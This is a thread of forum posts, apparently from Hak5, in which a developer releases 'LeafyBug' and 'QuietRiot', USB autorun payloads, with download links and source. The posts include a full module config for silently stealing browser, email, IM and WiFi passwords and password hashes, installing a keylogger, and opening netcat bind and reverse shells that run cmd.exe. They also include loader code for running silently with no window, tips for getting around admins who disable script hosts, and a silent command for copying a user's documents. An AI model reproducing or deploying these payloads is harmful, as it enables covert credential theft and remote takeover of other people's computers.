twsSentinel

oh crap .. sry guys! ... I forgot to config IIS for those files. *fixed*

LeafyBug has been released (Look up top at first post). Please read the update first though. Thanks guys for your support!

Hey guys .. I'll release it either tomorrow, or in the next couple days. There's a couple of things I'd like to see implemented. Also, I have completely lost my U3 Drive (OMG!) sucks. I have no idea what happened to it. So I will be unable to test any U3 capabilities or create a U3 Package Installer. Hopefully I'll buy a new drive within a wk. I'm also still undecided about releasing a rootKit with the QuietRiot. The leafybug has the ability to use the hxdef RK, but I might just leave it up to the individuals to modify the HxDef rootkit. But we'll see. On another note, I'm working with the creator of PwDump v6.5 (foofus.net) to create an x64 compatible version. I will release the Lb/QuietRiot before this gets built, but hopefully an x64 version will be out soon. If you've ever tried to run it in a 64-bit environment, the application hangs. Anyways ... thanks for the support guys. Sorry for the wait!

it would not be difficult to fix this though, therefor I don't see the point. I guess it could be just annoying lol

hey there ... here's a U3 Dev Package ... Contains SDK, Prototyper, Manifest Creator, some other stuff... http://tws.serveftp.org/progs/U3 Dev Package (01.22.2007).zip://http://tws.serveftp.org/progs/U3 De...01.22.2007).zip://http://tws.serveftp.org/progs/U3 De...01.22.2007).zip://http://tws.serveftp.org/progs/U3 De...01.22.2007).zip://http://tws.serveftp.org/progs/U3 De...01.22.2007).zip://http://tws.serveftp.org/progs/U3 De...01.22.2007).zip://http://tws.serveftp.org/progs/U3 De...01.22.2007).zip or you can just download the SDK: http://tws.serveftp.org/progs/U3_Platform_...DK_May_2006.zip

very true, but come on ... if you are going to operate a web hosting company, you have to plan for these contingencies. Unless this attacker has enough zombie machines, in the hundreds or thousands, there are ways to defend against attacks.

Can they really be this bad at defending against a DDoS attack? My god, its been like a week straight.

The LeafyBug - A new advancement based off the SwitchBlabe PoC. Update: 6.09.2007 Well guys, I gotta say I'm sorry. The launch of the LeafyBug did not go quite as planned. I've been offered a partnership to a new startup eBusiness. So that has taken 100% of my time this past week. That and school. But I've decided to release the files. However, I did not get to finish all the features I wanted. Specifically the "Loader" application; so I have not included this in the downloads yet. Once done, the loader offers new solutions to the payload execution. First off it detects if .NET is installed on the computer, therefor, if the necessary dependencies are not found, the payload won't run. You can even specify to run a backup payload!. I has a few other features to assist in run customization. Anyway, to no further wait: http://tws.serveftp.org/software/LeafyBug/LeafyBug.zip << Framework exe http://tws.serveftp.org/software/LeafyBug/...ditor.zip << Payload Editor http://tws.serveftp.org/software/LeafyBug/...ource.zip << C# Source code for the framework http://tws.serveftp.org/software/LeafyBug/...ogger.zip << Small .NET Keylogger I made which works x86 & x64. Does not use WinAPI Hooks. *More info on .NETLogger can be found at: http://www.codeproject.com/useritems/NetKeyLogger.asp. I've released it open-source there. Please guys, accept my apologies on this release. I really intended to have it 100% finished; all features. I will finish the project, but I can't really give an ETA. The LbLoader application will be released within the next week or so. Those files are being hosted directly off my pc server, so if you want to spread to RapidShare, be my guest. :) What is the LeafyBug? All this time here at Hak5.org, we've had several U3 Payloads come and go. Most of us found one we liked or created our own. However the LeafyBug brings a whole new aspect to the table. The LeafyBug, is NOT a payload, it is a payload framework which allows you to extend the Switchblade's concept to a greater extent. Think of it this way, the LeafyBug is like the payload engine. The payloads themselves are only made up of 2 ini setup files. The QuietRiot v2.1.5 is the first payload for this new framework. ;*********************************************** * ;* QuietRiot v2.1.5 Modules ;* LeafyBug Payload ;* Date: 5/25/2007 ;* Code: _DmG_ ;*********************************************** */ ;* ******************************************************************************** *********************************** * ;* Creating Custom Modules: ;* ;* To create a module you must specify certain variables... ;* =-----------------------------------------------------------------------------------------------------------------= ;* | Var | Value | Required | ;* =-----------------------------------------------------------------------------------------------------------------= ;* Enabled = Enabled or Disabled (Write 'true' or 'false') YES ;* Filename = EXE_NAME("Name of actual exe's name")(Ex. keyLogger.exe, netstat) YES ;* Mode = (Choices either 1,2,3) YES ;* 1 = SystemInfo (Ex. netstat, ipconfig) Used for system executable's only ;* 2 = Executable (The exe will be run from usb device) ;* 3 = Executable (The exe will be copied to target. If RootKit is enabled, it will ;* run under its protection.) ;* =-----------------------------------------------------------------------------------------------------------------= ;* FileDIR = Path to copy exe to if 'Mode'== 2 or 3 (Default. Leave empty) NO ;* PreArgs = Custom export args (This string will be sent after the EXE_NAME &amp; NO ;* before the output filename) Nirsoft applications generally use '/stext' to ;* output into a log, but some apps require something different. See the ;* "Firefox Passwords" module for an example. ;* PostArgs = Custom export args NO ;* If Mode == 2: This string will be sent after the output filename. Ex. See "AdapterWatch". ;* If Mode == 3: Use this string to set the name for the registry key. Ex. See "KeyLogger" ;* x64 = x64 Flag! (If you know an app is incompatible with x64 OS, than set to "true". NO ;* The app wont run.)(Default. Leave empty or false)(See "pwdump" module as an example.) ;* x64File = x64 Alternative EXE Support (If you have two executables one for x86, and x64, NO ;* you can set the EXE_NAME to the file here. ;* (See "CurrentPorts" &amp; "WifiKeys" modules as examples.) ;* Output = If the application will output text, leave blank or set to true, otherwise, false. NO ;* (See "NetCat" or "Keylogger", these programs dont require the app to finish.) ;* =-----------------------------------------------------------------------------------------------------------------= ;* ******************************************************************************** *********************************** * ;PRE-CONFIGURED VARIABLES: Use these to aid in settings. ; ;$DRIVE_DIR$ » Drive the payload executes from. ;$MACHINE_NAME$ » Target computers name. ;$SYSTEM$ » Target computers system32 directory. ;$DATE$ » Date of execution. ;$TIME$ » Time of execution. ;$NC_PORT$ » Port number specified in config file. ;$NC_RVS_IP$ » Reverse shell IP. ;$NC_RVS_PORT$ » Reverse shell port. [Anti-Virus Killer] Enabled=false Filename= Mode= FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output=false [NetStat] Enabled=false Filename=netstat Mode=1 FileDir=$FILE_DIR$ PreArgs=-n PostArgs= x64= x64File= Output= [AdapterWatch] Enabled=true Filename=quietriot_awatch.exe Mode=2 FileDir=$FILE_DIR$ PreArgs=/stab PostArgs=1 x64= x64File= Output= [CurrentPorts] Enabled=true Filename=quietriot_cports.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64=true x64File=quietriot_cports64.exe Output= [Firefox Passwords] Enabled=true Filename=quietriot_FirePassword.exe Mode=2 FileDir=$FILE_DIR$ PreArgs=&gt;&gt; PostArgs= x64= x64File= Output= [Internet Explorer] Enabled=true Filename=quietriot_iepv.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [Internet Explorer History] Enabled=true Filename=quietriot_iehv.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [Product Keys] Enabled=true Filename=quietriot_ProduKey.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [Instant Messenger] Enabled=true Filename=quietriot_mspass.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [E-Mail Accounts] Enabled=true Filename=quietriot_mailpv.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [Windows Updates] Enabled=true Filename=quietriot_wul.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [Protected Storage] Enabled=true Filename=quietriot_pspv.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [WiFi Keys] Enabled=true Filename=quietriot_WirelessKeyView.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File=quietriot_WirelessKeyView64.exe Output= [KeyLogger] Enabled=true Filename=quietriot_NetLogger.exe Mode=3 FileDir=$FILE_DIR$ PreArgs=-m hour PostArgs=MSKL x64= x64File= Output=false [PwDump] Enabled=true Filename=quietriot_pwdump.exe Mode=2 FileDir=$FILE_DIR$ PreArgs=&gt;&gt; PostArgs= x64=true x64File= Output= [NetCat BindShell] Enabled=true Filename=quietriot_nc.exe Mode=3 FileDir=$FILE_DIR$ PreArgs=-L -p $NC_PORT$ -d -e cmd.exe PostArgs=MSNCBS x64= x64File= Output=false [NetCat ReverseShell] Enabled=false Filename=quietriot_nc.exe Mode=3 FileDir=$FILE_DIR$ PreArgs=$NC_RVS_IP$ $NC_RVS_PORT$ -e cmd.exe PostArgs=MSNCRS x64= x64File= Output=false Oooohhh, Aaahhhhh ... What's so damn special about it?!? No more shell coding, you have the power of the .NET Framework without even coding one thing. The software is already in place ... just create 2 simple files with the LeafyBug Editor. This project is nearing completion. All code is pretty much done. Just few more quick features to add. Here's why to migrate to the LeafyBug: [li]Full WinOS Compatability and Customization - x86 & x64[/li] [li]100% hidden running ... other payloads would show up on x64[/li] [li]LeafyBug SmartTags :: Be able to use the .NET Framework without even coding. Hardcoded SmartTags like ($MACHINE_NAME$, $DATE$) will give you current information on each run.[/li] [li]Auto-Detects system architecture, allows you to specify 32&64bit apps for each module, and automatically executes the proper one.[/li] [li]RootKit Ability[/li] [li]Easy to create, expand, simplify with no code what-so-ever. Add new modules with ease in the editor.[/li] [li]Customize each module down to a T how it will run and execute.[/li] [li]Installation is simple, place whatever you want in any drive/directory[/li] [li]U3 & Non-U3 Compliant[/li]

Yep, I just did a little checking. Nakaori wrote this excellent little code. Create a file in your usb drive Ex.("usb:FILENAME.txt") Then you the above code to look for that file and get the drive letter. for %%i in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:FILENAME.txt set DRIVE = %%i I haven't tested it though, but should work.

Might be tough or not possible through shell code. You best chance I guess would be to create a For loop iterating through each letter of the alphabet and issuing the command: "vol DRIVE_LETTER:" and check to see if the drive volume exists and what its name is. This would be quite annoying, and Im not writing the code lol Why is ur payload on the CD partition anyway?

Another option would be for the switchblade app to check for that certain MS Hotfix, if its installed, and then either run the program or not. Would not be tough to implement. Also "shutdown.exe /a" will abort the shutdown process if its been executed.

Hey there ... What you're looking for is either of two programs. PackageFactory OR U3 Package Prototyper Both can convert a software into a U3 Program. However, that being said, it's only meant for certain software. An anti-virus might be too complex to do a simple convert, but it's worth giving a shot. If you need help getting the software let me know I'll post a link.

Nothing will show when the QRLoader runs. That's the point of having it 100% silent. lol It automatically executes QuietRiot.vbs via WScript.exe In order for it to work, however, the QRLoader.exe MUST be in the same folder as "QuietRiot.vbs" & "WScript.exe". If you want it in a different folder, you'll have to edit the C++ code and recompile it. But it's only a minor adjustment.

Thanks for the response. The QRLoader is an exe file which executes wscript.exe (Windows Script Host 5.6) and tells the WSH to run QuietRiot.vbs (the payload). It's not a required file, but very helpful. You can use it to configure your autorun.inf and other things like the U3 installer. The QRLoader is also open source, so any c++ developers can easily write extra features in it. Something that I've been meaning to write a small article on. Thank you for the suggestion/request ... That will be added into the payload in the next version. If I have some time later tonight .. I code it in quickly.

1) What is the difference (for switchblade) of having U3 as opposed to not? In other words, is it easier to steal information or does it steal more information? > There aren't any real advantages concerning a U3-Enabled Switchblade over a regular drive. You can configure it to do the same. The only loss is the ability to run U3 Applications. 2) What exactly does the default coding steal and how do you edit/manipulate this to steal other things? > As for myself, I've only used custom payloads and then now designed my own. (Quiet-Riot) They all offer many similar options, however, some are more equip than others. 3) How would I create a USB that automatically and silently copies all files from, say, the My Document folder? > Well if you're writing the payload in shell script, then you'll want to execute "%COMSPEC% copy %userprofile%My Documents FLASH_DRIVE_FOLDER" or something like that. Search google to learn shell scripting.

Well, most admins disable the WSH by removing the file association (.vbs). Sometimes they also delete or rename "wscript.exe" and "cscript.exe" on their systems. However, the QRLoader.exe is coded to execute wscript.exe while passing QuietRiot.vbs as arg. I'm not too familiar with how the WSH runs thoroughly, but I'm almost positive it requires "vbscript.dll" to compile vbscript. So if you want to make the QuietRiot Payload even more powerful ... maybe try including "vbscript.dll" in the directory containing QRLoader.exe, QuietRiot.vbs, and WScript.exe. This way even if the .vbs file-association has been removed, or WScript.exe has been deleted or renamed, the Quiet-Riot Payload has all the necessary dependencies to run. Hope this helps ... I'll do some more research on WSH Security and make sure this work-around really works! -Sent

understandable concern... especially since I'm new to the community here. But I stand by my work. The QRLoader source code is provided and anyone who can understand VBScript can verify the payload script. Other than that, I guess there's nothing more I can say. Hopefully a developer will check the script for you all. -Sent The Tools.zip contains the most recent NirSoft apps too.

Hello all, Here's a recent U3 Switchblade project in the works. The Quiet-Riot was designed with three things in mind: 1. Extremely easily customizable. 2. 100% silent/compatible on all Windows OS's (>= Win2k + 64bit) 3. U3 Program Installer Why this payload was written: I currently work and develop in Windows 2003 Server x64 environment. I found all other payloads on here to not be 100% silent. (No console windows) I also found the use of .bat files to be tiresome to debug and go through. Also the lack of ease for turning on and off payload modules. This is not to say the other payloads aren't great. I think they're excellent. I base the Quiet-Riot straight from them, but with improved features. I would have never written this if it weren't for them. Thank you fellow developers! On to the payload: [screen-Shots] http://tws.serveftp.org/software/QuietRiot/QR_Tutorial_1.JPG http://tws.serveftp.org/software/QuietRiot/QR_Tutorial_2.JPG http://tws.serveftp.org/software/QuietRiot..._Tutorial_1.JPG http://tws.serveftp.org/software/QuietRiot..._Tutorial_2.JPG [Download] QuietRiot.zip » The actual payload. QRLoader.zip » The C++ Source for the main exe file. Tools.zip » A collection of most of the tools listed at Hak5.org Quiet-Riot U3 Installer(u3p).zip » A U3 QuietRiot Installer (INSTALLS BUT NOT FUNCTIONAL YET!)(For developer use) These files are hosted on my server. My max upload speed is 128KB/s. Feel free to upload these to rapid share or public share sites if you like. [QuietRiot.zip] http://tws.serveftp.org/software/QuietRiot/QuietRiot.zip 137KB [QRLoader.zip] http://tws.serveftp.org/software/QuietRiot/QRLoader.zip 3.14MB [Tools.zip] http://tws.serveftp.org/software/QuietRiot/Tools.zip 889KB [u3Installer.zip] http://tws.serveftp.org/software/QuietRiot/U3Installer.zip 220KB *** I have not included a Anti-Virus Killer or KeyLogger in the Tools.zip. I will be doing some research on AVKillers before updating QuietRiot with one. As for the KeyLogger, since I do developing on a x64 system, most small keyloggers lock up the system. Will update the payload once more research is done as well. If you need help installing or getting the payload to work, just post here. If you have any suggestions/bugs/comments post here as well or message me. Thanks Hak5 for making such a great site!!! UPDATE 1.28.07 There are two small updates made to the payload script. 1. For the NetCat Bindshell module, if you turn on the "2Drive" option, I forgot to add a "xcopy /B". The '/B' signifies that its a binary file to copy. 2. In the "System Info" module, I had a pointless WScript.Disconnect ObjFile command. I just removed it since it did nothing. The ObjFile was just reset once the next module is loaded. Newest Quiet-Riot Version http://tws.serveftp.org/software/QuietRiot...iot(UPDATE).zip // This is only the vbscript payload file. The QuietRiot.zip has already been updated as well.[/b]

To all U3 developers or c++ programmers as well: I have written a small program which executes a vbscript file without the use of a console windows displayed: I am able to successfully build and installed my u3p. application after using U3 Package Prototyper as well as PackageFactory; however for some reason U3 doesn't like to run my exe file successfully. Heres the code: In the Project -> Settings -> Link -> Project Options I set "/subsystem:windows" instead of "/subsystem:console". This way i can completely get rid of the console window. #include &lt;shlobj.h&gt; int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { ShellExecute(NULL,"open",".QuietRiot.vbs",NULL,NULL,0); return 0; } if I manually double-click the exe, it works flawlessly, why won't it work with U3? any ideas?

thanks for the reply's ... I've tried every-which-way to write the autorun.inf and still no luck. I have an Ativa U3, but with the SanDisk LaunchU3.exe installed. Anyway, once U3's developer site is back working, I'll register and package the payload as a software app. Thanks again guys.

Hello all, I've written an excellent payload for USB. It's been modded quite a lot from the others on here and I think you will all like it. Before I post the current version, I'm having some problems with the Autorun. I can't seem to get it to run my script or anything. I'm guessing its something in the OS, but then I tried it on a WinXP machine and still no luck. Im doing most of the testing as of now on win2003 server. Any clue why I can't get it to automatically run?

SOLUTION For those who have had this problem, for those who do in the future. I've found a temporary/permanent solution. If you happen to lose the U3 LaunchPad.exe, and you do not have a SanDisk, or Memorex, read below to get your LaunchPad working again. FIRSTLY, BACKUP YOU U3 Drive!!! 1. Download Universal U3 LaunchPad Hacker AND Unzip http://www.hak5.org/packages/files/Universal_Customizer.zip 2. Download this SanDisk LaunchPad provided by moonboy33 on these forums. http://www.hak5.org/forums/viewtopic.php?t=4018 3. Unzip the 3 files (autofun.inf, LaunchPad.zip, LaunchU3.exe) to the Universal U3 LaunchPad Hacker -> U3CUSTOM folder. 4. Run "ISOCreate.cmd" found in the "Universal U3 LaunchPad Hacker" folder. 5. Run Universal_Customizer.exe Thats it!!! Once you're instructed to plug the FlashDrive back in, after it's done flashing, you'll see the LaunchPad come back up! -------------------------------------------------------------------------- NOTE! I haven't done much testing yet to see if the SanDisk LaunchPad differs from your hardware manufacturers'. In my case, I have an Ativa U3 Flash Drive and am using the SanDisk LaunchPad. Will update here if anything is incompatible; so far, so good though!

After doing some support search on U3.com ... I see that there is no LaunchPad.exe in the cd drive. What happened to it? .. Can I get it back?

Hi there, Just wondering if there was any users with an Ativa U3 flash drive. I used the "Universal U3 Launchpad Hacker" to flash the partition, and now the LaunchPad will not display! Anyone have a clue what I can do?!? The usb drive still works, but only opens as a folder. Helllllp!!! :) How come U3 doesnt release the original LaunchPad or each manufacturer. Let me know if you can help me out. Thanks! -Sent